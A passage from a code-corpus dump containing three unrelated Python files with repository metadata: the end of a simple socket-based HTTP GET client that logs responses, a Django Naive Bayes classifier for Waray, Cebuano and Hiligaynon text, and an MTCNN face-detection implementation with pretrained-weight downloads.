check_ip = re.findall("([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})", url)
if (len(check_host) == 0 and len(check_domain) == 0 and len(check_ip) == 0):
    sys.exit("Couldn't find host " + url)
if (parsed == None):
    sys.exit("Parsed argument errored.")

# HTTPS is not supported.
# BUG FIX: the original read the scheme variable even when no scheme matched,
# raising a NameError for scheme-less URLs.
https_true = False
if http_exists and parsed.group('http') == "https":
    https_true = True
if https_true:
    sys.exit("HTTPS is not supported.")

##Port settings
# BUG FIX: the original branched on "port is None" (never true for this regex)
# and fell back to 80 even when the URL carried an explicit port, so the
# parsed port was never used.
rawr = parsed.group('port')
port_true = (rawr == "443")  # HTTPS port is rejected after the request below
if rawr:  # non-empty digit string -> explicit port
    neededInfo['sPort'] = int(rawr)
else:
    neededInfo['sPort'] = 80

# set sName and sIp (a second argv token supplies whichever one the URL lacks)
rawr = parsed.group('site')
multi_input = (len(cmd_input) == 2)
if not multi_input:
    neededInfo['sName'] = rawr
    neededInfo['sIp'] = socket.gethostbyname(neededInfo['sName'])
else:
    if re.match("[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}", rawr):
        neededInfo['sName'] = cmd_input[1]
        neededInfo['sIp'] = rawr
    else:
        neededInfo['sName'] = rawr
        neededInfo['sIp'] = cmd_input[1]

# setting path (default "/")
rawr = parsed.group('path')
if rawr == None:
    neededInfo['Path'] = "/"
else:
    neededInfo['Path'] = rawr

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#start connection between source and and host
sock.connect((neededInfo['sIp'], neededInfo['sPort']))
sock.settimeout(TIMEOUT_SIZE)
neededInfo['cIp'], neededInfo['cPort'] = sock.getsockname() #gets cip and cport

request = "GET {} HTTP/1.1\r\nHost:{}\r\n\r\n".format(neededInfo['Path'], neededInfo['sName'])
sock.send(request.encode()) #changing request (type string) need to encode to a byte

#if the port is bad, we print to our Log file with the respective parameters
if port_true:
    log = "Unsuccessful, 56, {}, {}, {}, {}, {}, {}, [Errno 54] Connection reset by peer\n\n".format(url,
        neededInfo['sName'], str(neededInfo['cIp']), str(neededInfo['sIp']), str(neededInfo['cPort']),
        str(neededInfo['sPort']))
    f = open("Log.csv", "a")
    f.write(log)
    f.close()
    sys.exit("Port not supported")

# Read the response header one byte at a time until the blank line.
neededInfo['msg'] = ""
try:
    while True:
        pack = sock.recv(1) #getting one byte
        if("\r\n\r" in neededInfo['msg'] or pack == None): #\r\n\r signals the end of the header
            break
        neededInfo['msg'] = neededInfo['msg'] + pack.decode()
except:
    sock.close()
    sys.exit("Could not receieved information from message.")

msg_true = re.search(r"Content-Length: (\d+)", neededInfo['msg']) #get content length
msg_exists = False
if msg_true != None:
    msg_true = int(msg_true.group(1)) - len(neededInfo['msg'].encode())
    msg_exists = True

# Read the body (when Content-Length was present) in BUFF_SIZE chunks;
# a short read marks the final chunk.
neededInfo['html_msg'] = ""
if msg_exists:
    try:
        while True:
            pack = sock.recv(BUFF_SIZE)
            neededInfo['html_msg'] = neededInfo['html_msg'] + pack.decode()
            if len(pack) != BUFF_SIZE:
                break
    except Exception as e:
        sock.close()
        sys.exit("Could not receieved information from message.")
sock.close()

#set status based on above
http_status = re.search(r"(HTTP/.*)?", neededInfo['msg']).group(1)

#print the html content into my httpoutput.html file
f = open("HTTPoutput.html", "w")
f.write(neededInfo['html_msg'])
f.close()

#print to my log file with respective parameters
status_code = re.search(r"HTTP/\d{1}.?\d? (\d*)? \w+", http_status).group(1)
success = (status_code == '200')
run_status = "Successful" if success else "Unsuccessful"
term_out = run_status + " " + url + " " + http_status
print(term_out)
if "chunked" in neededInfo['msg']:
    print("ERROR: Chunk encoding is not supported")

log = (run_status + " " + status_code + " " + url + " " + neededInfo['sName'] + " "
       + str(neededInfo['cIp']) + " " + str(neededInfo['sIp']) + " "
       + str(neededInfo['cPort']) + " " + str(neededInfo['sPort']) + " "
       + http_status + "\n\n")
f = open("Log.csv", "a")
f.write(log)
f.close()
| kelly8282/python-stuff | kliu80MyCurl_2_1.py | kliu80MyCurl_2_1.py | py | 6,029 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_nu... |
42514144175 | import math
import nltk
nltk.download('stopwords')
import pandas as pd
import re
from copy import deepcopy
from dictionary.models import Dialect
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from django.shortcuts import render, redirect
class NaiveBayes:
def split_reg(self, *args):
sentence = self.lower()
new = ' '.join([word for word in re.split(r'[^A-Za-z]', sentence) if word])
return new
def split_word(new):
stop_words_lst = set(stopwords.words("english"))
stop_words_lst.update (('ako','ang','amua','ato','busa','ikaw','ila','ilang','imo','imong','iya','iyang','kaayo','kana',
'kaniya','kaugalingon','kay','kini','kinsa','kita','lamang','mahimong','mga','mismo','nahimo'
,'nga','pareho','pud','sila','siya','unsa','sa','ug','nang', 'ng','diay', 'atu', 'mo'))
sentence = new.lower()
new_str = ' '.join([word for word in sentence.split(' ') if word not in stop_words_lst])
return new_str
def train_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
warays = Dialect.objects.filter(dialect='Waray')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
war_count = 1
for waray in warays:
for user_input in user_inputs:
if waray.word == user_input:
war_count *= (1 + 1) / (waray_count + doc_count)
return war_count
def train_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
cebus = Dialect.objects.filter(dialect='Cebuano')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
ceb_count = 1
for cebu in cebus:
for user_input in user_inputs:
if cebu.word == user_input:
ceb_count *= (1 + 1) / (cebu_count + doc_count)
return ceb_count
def train_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
hiligs = Dialect.objects.filter(dialect='Hiligaynon')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
hil_count = 1
for hilig in hiligs:
for user_input in user_inputs:
if hilig.word == user_input:
hil_count *= (1 + 1) / (hili_count + doc_count)
return hil_count
def smooth_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_war = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Waray').exists():
pass
else:
smooth_war *= 1 / (waray_count + doc_count)
return smooth_war
def smooth_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_ceb = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Cebuano').exists():
pass
else:
smooth_ceb *= 1 / (cebu_count + doc_count)
return smooth_ceb
def smooth_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_hil = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Hiligaynon').exists():
pass
else:
smooth_hil *= 1 / (hili_count + doc_count)
return smooth_hil
    def multi_words(war_count, ceb_count, hil_count, smooth_war, smooth_ceb, smooth_hil):
        """Combine per-dialect likelihoods, smoothing factors and class
        priors, then return the name of the winning dialect.

        NOTE(review): takes no ``self`` — effectively a static function.
        """
        # Class priors: fraction of the dictionary belonging to each dialect.
        waray_count = Dialect.objects.filter(dialect='Waray').count()
        cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
        hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
        doc_count = Dialect.objects.count()
        priorLogWar = waray_count/doc_count
        priorLogCeb = cebu_count/doc_count
        priorLogHil = hili_count/doc_count
        war_val = 0
        ceb_val = 0
        hil_val = 0
        # A likelihood of exactly 1 means "no token matched"; the score stays 0.
        # NOTE(review): `war_val *= war_count` is a no-op on 0 — presumably
        # intentional, but `war_val = 0` alone would be clearer.
        if war_count == 1:
            war_val *= war_count
        else:
            war_val = war_count * smooth_war * priorLogWar
        if ceb_count == 1:
            ceb_val *= ceb_count
        else:
            ceb_val = ceb_count * smooth_ceb * priorLogCeb
        if hil_count == 1:
            hil_val *= hil_count
        else:
            hil_val = hil_count * smooth_hil * priorLogHil
        # Pick the dialect with the strictly largest score; exact ties fall
        # through to the final branch.
        if war_val > ceb_val and war_val > hil_val:
            return 'Waray'
        elif ceb_val > war_val and ceb_val > hil_val:
            return 'Cebuano'
        elif hil_val > war_val and hil_val > ceb_val:
            return 'Hiligaynon'
        # NOTE(review): by operator precedence this reads
        # `war_val and ceb_val and (hil_val == 0)` — almost certainly meant
        # `war_val == 0 and ceb_val == 0 and hil_val == 0`; confirm intent.
        elif war_val and ceb_val and hil_val == 0:
return 'Word does not exist' | eymkarla/thesisrepo | classifier/NB.py | NB.py | py | 4,535 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "nltk.download",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwor... |
72000467069 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import builtins
import gc
import os
import time
import numpy as np
import torch
from trident.backend.common import *
from trident.backend.opencv_backend import image2array
from trident.backend.pytorch_backend import *
from trident.backend.pytorch_backend import Layer, Sequential, load, get_device, fix_layer
from trident.backend.pytorch_ops import *
from trident.data.image_common import *
from trident.data.utils import download_model_from_google_drive
from trident.data.vision_transforms import Normalize
from trident.layers.pytorch_activations import PRelu
from trident.layers.pytorch_layers import *
from trident.layers.pytorch_pooling import *
from trident.optims.pytorch_trainer import ImageDetectionModel
__all__ = ['Pnet', 'Rnet', 'Onet', 'Mtcnn']
# Shared trident session/device state and the on-disk cache directory for
# the downloaded pretrained checkpoints (~/.trident/models by default).
_session = get_session()
_device = get_device()
_epsilon = _session.epsilon
_trident_dir = _session.trident_dir
dirname = os.path.join(_trident_dir, 'models')
if not os.path.exists(dirname):
    try:
        os.makedirs(dirname)
    except OSError:
        # Except permission denied and potential race conditions
        # in multi-threaded environments.
        pass
def p_net():
    """Proposal network (P-Net): the fully-convolutional 12x12 MTCNN stage.

    Per spatial position it emits a dict of heads: 'confidence' (face
    probability, sigmoid), 'box' (4 regression offsets) and 'landmark'
    (10 landmark coordinates).  Layer names (conv1..conv4_3) presumably
    must match the pretrained checkpoint loaded by ``Pnet`` — confirm
    before renaming.
    """
    return Sequential(
        Conv2d((3, 3), 10, strides=1, auto_pad=False, use_bias=True, name='conv1'),
        PRelu(num_parameters=1),
        MaxPool2d((2, 2), strides=2, auto_pad=False),
        Conv2d((3, 3), 16, strides=1, auto_pad=False, use_bias=True, name='conv2'),
        PRelu(num_parameters=1),
        Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv3'),
        PRelu(num_parameters=1),
        ModuleDict(
            {'confidence': Conv2d((1, 1), 1, strides=1, auto_pad=False, use_bias=True, activation='sigmoid',
                                  name='conv4_1'),
             'box': Conv2d((1, 1), 4, strides=1, auto_pad=False, use_bias=True, name='conv4_2'),
             'landmark': Conv2d((1, 1), 10, strides=1, auto_pad=False, use_bias=True, name='conv4_3')},
            is_multicasting=True)
        , name='pnet')
def r_net():
    """Refinement network (R-Net): the 24x24 MTCNN stage.

    Ends in dense heads: 'confidence' (sigmoid), 'box' (4 offsets) and
    'landmark' (10 coordinates).  Layer names presumably must match the
    pretrained checkpoint loaded by ``Rnet`` — confirm before renaming.
    """
    return Sequential(
        Conv2d((3, 3), 28, strides=1, auto_pad=False, use_bias=True, name='conv1'),
        PRelu(num_parameters=1),
        MaxPool2d((3, 3), strides=2, auto_pad=False),
        Conv2d((3, 3), 48, strides=1, auto_pad=False, use_bias=True, name='conv2'),
        PRelu(num_parameters=1),
        MaxPool2d((3, 3), strides=2, auto_pad=False),
        Conv2d((2, 2), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
        PRelu(num_parameters=1),
        Flatten(),
        Dense(128, activation=None, use_bias=True, name='conv4'),
        PRelu(num_parameters=1),
        ModuleDict({
            'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv5_1'),
            'box': Dense(4, activation=None, use_bias=True, name='conv5_2'),
            'landmark': Dense(10, activation=None, use_bias=True, name='conv5_3')}, is_multicasting=True)
        , name='rnet')
def o_net():
    """Output network (O-Net): the 48x48 MTCNN stage.

    Ends in dense heads: 'confidence' (sigmoid), 'box' (4 offsets) and
    'landmark' (10 coordinates — the only stage whose landmarks are used
    downstream).  Layer names presumably must match the pretrained
    checkpoint loaded by ``Onet`` — confirm before renaming.
    """
    return Sequential(
        Conv2d((3, 3), 32, strides=1, auto_pad=False, use_bias=True, name='conv1'),
        PRelu(num_parameters=1),
        MaxPool2d((3, 3), strides=2, auto_pad=False),
        Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv2'),
        PRelu(num_parameters=1),
        MaxPool2d((3, 3), strides=2, auto_pad=False),
        Conv2d((3, 3), 64, strides=1, auto_pad=False, use_bias=True, name='conv3'),
        PRelu(num_parameters=1),
        MaxPool2d((2, 2), strides=2, auto_pad=False),
        Conv2d((2, 2), 128, strides=1, auto_pad=False, use_bias=True, name='conv4'),
        PRelu(num_parameters=1),
        Flatten(),
        Dense(256, activation=None, use_bias=True, name='conv5'),
        PRelu(num_parameters=1),
        ModuleDict({
            'confidence': Dense(1, activation='sigmoid', use_bias=True, name='conv6_1'),
            'box': Dense(4, activation=None, use_bias=True, name='conv6_2'),
            'landmark': Dense(10, activation=None, use_bias=True, name='conv6_3')}, is_multicasting=True)
        , name='onet')
def Pnet(pretrained=True,
         input_shape=(3, 12, 12),
         freeze_features=True,
         **kwargs):
    """Build the MTCNN proposal network wrapped in an ImageDetectionModel.

    Args:
        pretrained: when truthy, download and load the published weights.
        input_shape: (C, H, W); any value that is not a length-3 sequence
            falls back to the default (3, 12, 12).
        freeze_features: accepted for API compatibility but currently
            unused in this function.
    Returns:
        An ImageDetectionModel whose ``model`` is the P-Net.
    """
    if input_shape is not None and len(input_shape) == 3:
        input_shape = tuple(input_shape)
    else:
        input_shape = (3, 12, 12)
    pnet = ImageDetectionModel(input_shape=input_shape, output=p_net())
    pnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
    if pretrained:  # idiomatic truthiness instead of `== True`
        download_model_from_google_drive('1w9ahipO8D9U1dAXMc2BewuL0UqIBYWSX', dirname, 'pnet.pth')
        recovery_model = fix_layer(load(os.path.join(dirname, 'pnet.pth')))
        pnet.model = recovery_model
        pnet.model.input_shape = input_shape
        pnet.model.to(_device)
    return pnet
def Rnet(pretrained=True,
         input_shape=(3, 24, 24),
         **kwargs):
    """Build the MTCNN refinement network wrapped in an ImageDetectionModel.

    Args:
        pretrained: when truthy, download and load the published weights.
        input_shape: (C, H, W); any value that is not a length-3 sequence
            falls back to the default (3, 24, 24).
    Returns:
        An ImageDetectionModel whose ``model`` is the R-Net.
    """
    if input_shape is not None and len(input_shape) == 3:
        input_shape = tuple(input_shape)
    else:
        input_shape = (3, 24, 24)
    rnet = ImageDetectionModel(input_shape=input_shape, output=r_net())
    rnet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
    if pretrained:  # idiomatic truthiness instead of `== True`
        download_model_from_google_drive('1CH7z133_KrcWMx9zXAblMCV8luiQ3wph', dirname, 'rnet.pth')
        recovery_model = load(os.path.join(dirname, 'rnet.pth'))
        recovery_model = fix_layer(recovery_model)
        recovery_model.to(_device)
        rnet.model = recovery_model
    return rnet
def Onet(pretrained=True,
         input_shape=(3, 48, 48),
         **kwargs):
    """Build the MTCNN output network wrapped in an ImageDetectionModel.

    Args:
        pretrained: when truthy, download and load the published weights.
        input_shape: (C, H, W); any value that is not a length-3 sequence
            falls back to the default (3, 48, 48).
    Returns:
        An ImageDetectionModel whose ``model`` is the O-Net.
    """
    if input_shape is not None and len(input_shape) == 3:
        input_shape = tuple(input_shape)
    else:
        input_shape = (3, 48, 48)
    # Fixed: use the validated `input_shape` instead of a hard-coded
    # (3, 48, 48), for consistency with Pnet()/Rnet().
    onet = ImageDetectionModel(input_shape=input_shape, output=o_net())
    onet.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
    if pretrained:  # idiomatic truthiness instead of `== True`
        download_model_from_google_drive('1a1dAlSzJOAfIz77Ic38JMQJYWDG_b7-_', dirname, 'onet.pth')
        recovery_model = load(os.path.join(dirname, 'onet.pth'))
        recovery_model = fix_layer(recovery_model)
        recovery_model.to(_device)
        onet.model = recovery_model
    return onet
class DetectorHead(Layer):
    """Decode raw P-Net output maps into candidate boxes.

    forward() expects ``input.value_list`` to unpack into
    (confidence map, box-regression map, landmark map) and returns a
    tensor of rows ``[x1, y1, x2, y2, score]`` for every position whose
    score clears ``detection_threshold``, or None when the result is
    empty.

    NOTE(review): ``min_size`` is stored but currently unused (the
    commented-out remove_small_boxes call that consumed it was removed).
    """

    def __init__(self, cellsize=12, threshold=0.5, min_size=5, **kwargs):
        super(DetectorHead, self).__init__(**kwargs)
        self.cellsize = cellsize
        self.detection_threshold = threshold
        self.min_size = min_size
        self._built = True

    def forward(self, input, **kwargs):
        boxprobs, boxregs, landscape = input.value_list
        boxprobs = boxprobs[0]
        if boxprobs.size(0) == 2:
            # Two-channel softmax-style output: channel 1 is the face score.
            boxprobs = boxprobs[1:, :, :]
        strides = 2
        boxregs = boxregs[0]
        # Removed dead code from the original: unused `height/width`,
        # `input_shape` and `grid` computations.
        score = boxprobs[0]
        y, x = torch.where(score >= self.detection_threshold)
        boxregs = boxregs.permute(1, 2, 0)
        score = score[(y, x)]
        reg = boxregs[(y, x)].transpose(1, 0)
        bb = torch.stack([x, y], dim=0)
        # Map feature-map positions back to 12x12 windows in input pixels.
        q1 = (strides * bb + 1)
        q2 = (strides * bb + self.cellsize - 1 + 1)
        w = q2[0, :] - q1[0, :] + 1
        h = q2[1, :] - q1[1, :] + 1
        # Apply the regression offsets as fractions of the window size.
        b1 = q1[0, :] + reg[0, :] * w
        b2 = q1[1, :] + reg[1, :] * h
        b3 = q2[0, :] + reg[2, :] * w
        b4 = q2[1, :] + reg[3, :] * h
        boxs = torch.stack([b1, b2, b3, b4, score], dim=-1)
        if boxs is None or len(boxs.size()) == 0:
            return None
        elif len(boxs.size()) == 1:
            boxs = boxs.unsqueeze(0)
        return boxs
def remove_useless_boxes(boxes, image_size=None, min_size=5):
    """Filter degenerate candidate boxes.

    Drops rows of ``boxes`` ([n, 5] = x1, y1, x2, y2, score) whose area is
    not above ``min_size**2``, whose corner coordinates are not all
    positive, or whose width/height is not greater than 1.

    Args:
        boxes: tensor of shape [n, 5].
        image_size: accepted for API compatibility but unused.
        min_size: minimum side length used for the area test.
    Returns:
        The surviving rows of ``boxes``.
    """
    x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
    area = (x2 - x1 + 1) * (y2 - y1 + 1)
    boxes = boxes[area > min_size * min_size]
    x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
    # Fixed: the original tested y1.gt(0) twice and never checked y2.
    greater0 = x1.gt(0).float() * x2.gt(0).float() * y1.gt(0).float() * y2.gt(0).float()
    boxes = boxes[greater0 > 0]
    x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
    w = (x2 - x1)
    boxes = boxes[w > 1]
    x1, y1, x2, y2, score = [boxes[:, i] for i in range(5)]
    h = (y2 - y1)
    boxes = boxes[h > 1]
    return boxes
class Mtcnn(ImageDetectionModel):
    def __init__(self, pretrained=True, min_size=10, detection_threshold=(0.4, 0.7, 0.9), nms_threshold=(0.9, 0.8, 0.5),
                 **kwargs):
        """Three-stage MTCNN face detector (P-Net -> R-Net -> O-Net).

        Args:
            pretrained: load the published weights for all three stages.
            min_size: smallest face size (pixels) the image pyramid covers.
            detection_threshold: per-stage confidence cut-offs (P, R, O).
            nms_threshold: per-stage NMS overlap cut-offs (P, R, O).
        """
        self.pnet = Pnet(pretrained=pretrained, input_shape=(3, 12, 12)).model
        self.rnet = Rnet(pretrained=pretrained, input_shape=(3, 24, 24)).model
        self.onet = Onet(pretrained=pretrained, input_shape=(3, 48, 48)).model
        # The base model wraps only P-Net; R-Net and O-Net are invoked
        # manually inside detect().
        super(Mtcnn, self).__init__(input_shape=(3, 12, 12), output=self.pnet)
        self.min_size = min_size
        self.detection_threshold = detection_threshold
        self.nms_threshold = nms_threshold
        self.preprocess_flow = [Normalize(0, 255), image_backend_adaption]
    def get_image_pyrimid(self, img, min_size=None, factor=0.709):
        """Build the image pyramid for the P-Net stage.

        Returns ``(images, scales)``: rescaled copies of *img* and the
        scale factor applied to each, stopping once a 12x12 P-Net window
        would correspond to fewer than *min_size* original pixels.

        NOTE(review): `min_face_area` is computed but never used; the
        method name's "pyrimid" typo is part of the public interface.
        """
        if min_size is None:
            min_size = self.min_size
        min_face_area = (min_size, min_size)
        h = img.shape[0]
        w = img.shape[1]
        minl = np.amin([h, w])
        m = 12.0 / min_size
        minl = minl * m
        # Collect the scale ratios and the matching rescaled images.
        scales = []
        images = []
        factor_count = 0
        while minl >= 12:
            scales += [m * np.power(factor, factor_count)]
            scaled_img = rescale(scales[-1])(img.copy())
            images.append(scaled_img)
            minl = minl * factor
            factor_count += 1
        return images, scales
def generate_bboxes(self, probs, offsets, scale, threshold):
"""
基於Pnet產生初始的候選框
"""
stride = 2
cell_size = 12
# 透過np.where挑出符合基於門檻值的特徵圖位置(xy座標)
inds = where(probs > threshold)
'''
>>> a =np.array([[1,2,3],[4,5,6]])
>>> np.where(a>1)
(array([0, 0, 1, 1, 1]), array([1, 2, 0, 1, 2]))
'''
# 如果沒有區域滿足機率門檻值,則傳回空array
if inds[0].size == 0:
return np.array([])
# 根據pnet輸出的offset區域產生對應的x1,y1,x2,y2座標
tx1, ty1, tx2, ty2 = [offsets[0, i, inds[0], inds[1]] for i in range(4)]
offsets = stack([tx1, ty1, tx2, ty2], axis=-1)
# 以及抓出對應的機率值
score = probs[inds[0], inds[1]]
# 由於Pnet輸入的是基於圖像金字塔縮放尺度對應的圖片,因此需要根據縮放尺度來調整候選框座標,以還原成真實圖片的尺度
# 根據 候選框、機率值、offset來排列
bounding_boxes = concate([
round((stride * inds[1] + 1.0) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0) / scale).expand_dims(-1),
round((stride * inds[1] + 1.0 + cell_size) / scale).expand_dims(-1),
round((stride * inds[0] + 1.0 + cell_size) / scale).expand_dims(-1),
score.expand_dims(-1), offsets
], axis=-1)
print(bounding_boxes.shape)
# 將bounding_boxes由原本[框屬性數量,框個數]的形狀轉置為[框個數,框屬性數量]
return bounding_boxes
def convert_to_square(self, bboxes):
"""Convert bounding boxes to a square form.
Arguments:
bboxes: a float numpy array of shape [n, 5].
Returns:
a float numpy array of shape [n, 5],
squared bounding boxes.
"""
square_bboxes = zeros_like(bboxes)
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
h = y2 - y1 + 1.0
w = x2 - x1 + 1.0
max_side = maximum(h, w)
square_bboxes[:, 0] = x1 + w * 0.5 - max_side * 0.5
square_bboxes[:, 1] = y1 + h * 0.5 - max_side * 0.5
square_bboxes[:, 2] = square_bboxes[:, 0] + max_side - 1.0
square_bboxes[:, 3] = square_bboxes[:, 1] + max_side - 1.0
return square_bboxes
# 校準候選框座標
# 將offset對應至圖片長寬的線性縮放來獲得更新的候選框精調後座標
def calibrate_box(self, bboxes, offsets):
"""Transform bounding boxes to be more like true bounding boxes.
'offsets' is one of the outputs of the nets.
Arguments:
bboxes: a float numpy array of shape [n, 5].
offsets: a float numpy array of shape [n, 4].
Returns:
a float numpy array of shape [n, 5].
"""
x1, y1, x2, y2 = [bboxes[:, i] for i in range(4)]
w = x2 - x1 + 1.0
h = y2 - y1 + 1.0
# w [w_len, 1]
w = expand_dims(w, 1)
# h [h_len, 1]
h = expand_dims(h, 1)
translation = concate([w, h, w, h], axis=-1) * offsets
bboxes[:, 0:4] = bboxes[:, 0:4] + translation
return bboxes
# 基於tensor計算nms
    def nms(self, box_scores, overlap_threshold=0.5, top_k=-1):
        """Non-maximum suppression.
        Arguments:
            box_scores: a float numpy array of shape [n, 5],
                where each row is (xmin, ymin, xmax, ymax, score).
            overlap_threshold: a float number.
        Returns:
            list with indices of the selected boxes
        """
        # Rectangle area helper.
        def area_of(left_top, right_bottom):
            """Compute the areas of rectangles given two corners.
            Args:
                left_top (N, 2): left top corner.
                right_bottom (N, 2): right bottom corner.
            Returns:
                area (N): return the area.
            """
            hw = right_bottom - left_top
            return clip(hw[..., 0], min=0) * clip(hw[..., 1], min=0)
        # IoU helper (intersection over union).
        def iou_of(boxes0, boxes1, eps=1e-5):
            """Return intersection-over-union (Jaccard index) of boxes.
            Args:
                boxes0 (N, 4): ground truth boxes.
                boxes1 (N or 1, 4): predicted boxes.
                eps: a small number to avoid 0 as denominator.
            Returns:
                iou (N): IoU values.
            """
            overlap_left_top = maximum(boxes0[..., :2], boxes1[..., :2])
            overlap_right_bottom = minimum(boxes0[..., 2:], boxes1[..., 2:])
            overlap_area = area_of(overlap_left_top, overlap_right_bottom)
            area0 = area_of(boxes0[..., :2], boxes0[..., 2:])
            area1 = area_of(boxes1[..., :2], boxes1[..., 2:])
            return overlap_area / (area0 + area1 - overlap_area + eps)
        # No valid candidates: return an empty list.
        box_scores = to_tensor(box_scores)
        if len(box_scores) == 0:
            return []
        score = box_scores[:, 4]
        boxes = box_scores[:, :4]
        # Indices of the boxes that survive suppression.
        picked = []
        # Sort by confidence, ascending (the best box ends up last).
        indexes = argsort(score, descending=False)
        while len(indexes) > 0:
            # The last entry is therefore the current highest-scoring box;
            # accept it.
            current = indexes[-1]
            picked.append(current.item())
            # Stop once top_k boxes were picked or one candidate remains.
            if 0 < top_k == len(picked) or len(indexes) == 1:
                break
            current_box = boxes[current, :]
            current_score = score[current]  # NOTE(review): unused
            # Everything but the accepted box remains a candidate.
            indexes = indexes[:-1]
            rest_boxes = boxes[indexes, :]
            iou = iou_of(
                rest_boxes,
                expand_dims(current_box, axis=0),
            )
            # Keep only candidates not overlapping the accepted box beyond
            # the threshold.
            indexes = indexes[iou <= overlap_threshold]
        return picked
    def detect(self, image):
        """Run the full three-stage MTCNN cascade on one image.

        Arguments:
            image: an RGB image (a path or a numpy array).
        Returns:
            (image copy, bounding_boxes [n, 5], probs, landmarks [n, 10]);
            NOTE(review): the O-Net early exit returns only ([], []) — two
            values instead of four — so callers must handle both shapes.
        """
        # Keep the original image around for cropping in later stages.
        image = image2array(image)
        self.image = image
        self.height, self.width = image.shape[:2]
        min_length = min(self.height, self.width)
        # Stage 1: proposals from P-Net.
        bounding_boxes = []
        # Compute every scale ratio of the image pyramid first.
        images, scales = self.get_image_pyrimid(image, min_size=self.min_size, factor=0.707)
        # Run the fully-convolutional P-Net once per pyramid scale.
        for img, scale in zip(images, scales):
            # Generate candidates for this scale: probability threshold,
            # then NMS to drop duplicates.
            boxes = self.run_first_stage(img, scale)
            print('Scale:', builtins.round(scale * 10000) / 10000.0, 'Scaled Images:', img.shape, 'bboxes:', len(boxes),
                  flush=True)
            if boxes.ndim == 1:
                boxes.expand_dims(0)
            bounding_boxes.append(boxes)
        # Merge the candidates detected at every scale.
        bounding_boxes = [i for i in bounding_boxes if i is not None]
        bounding_boxes = concate(bounding_boxes, axis=0)
        print('totl bboxes:', len(bounding_boxes))
        # Calibrate the box coordinates, then run NMS.
        bounding_boxes = self.calibrate_box(bounding_boxes[:, 0:5], bounding_boxes[:, 5:])
        keep = self.nms(bounding_boxes[:, 0:5], self.nms_threshold[0])
        bounding_boxes = bounding_boxes[keep]
        # Make the boxes as close to squares as possible.
        bounding_boxes = self.convert_to_square(bounding_boxes)
        bounding_boxes[:, 0:4] = round(bounding_boxes[:, 0:4])
        print('totl bboxes after nms:', len(bounding_boxes))
        # (A commented-out matplotlib visualization of this stage's boxes
        # used to live here.)
        if is_gpu_available():
            torch.cuda.synchronize()
            torch.cuda.empty_cache()
            gc.collect()
        # Stage 2: refinement with R-Net.
        # Crop every surviving candidate, resize it to 24x24 and let R-Net
        # confirm it and refine its coordinates.
        img_boxes = self.get_image_boxes(bounding_boxes, size=24)
        print('RNet!')
        probs = []
        offsets = []
        if len(img_boxes) > 16:
            # Mini-batches of 16 keep GPU memory bounded.
            for i in range(len(img_boxes) // 16 + 1):
                if i * 16< len(img_boxes):
                    output = self.rnet(to_tensor(img_boxes[i * 16:(i + 1) * 16, :, :, :]))
                    probs.append(to_numpy(output['confidence']))
                    offsets.append(to_numpy(output['box']))
                    del output
            probs = np.concatenate(probs, axis=0)
            offsets =np.concatenate(offsets, axis=0)
        else:
            output = self.rnet(to_tensor(img_boxes))
            probs = to_numpy(output['confidence'])  # shape [n_boxes, 1]
            offsets = to_numpy(output['box'])  # shape [n_boxes, 4]
        # Drop candidates below this stage's probability threshold.
        keep = np.where(probs[:, 0] > self.detection_threshold[1])[0]
        bounding_boxes = to_numpy(bounding_boxes)[keep]
        bounding_boxes=np.concatenate([bounding_boxes[:,:4],probs[keep, 0].reshape((-1,1))],axis=1)
        #bounding_boxes[:, 4] = probs[keep, 0].reshape((-1,))
        offsets = offsets[keep]
        print('totl bboxes:', len(bounding_boxes))
        # Refine coordinates, then NMS again.
        bounding_boxes = self.calibrate_box(bounding_boxes, offsets)
        keep = self.nms(bounding_boxes, self.nms_threshold[1])
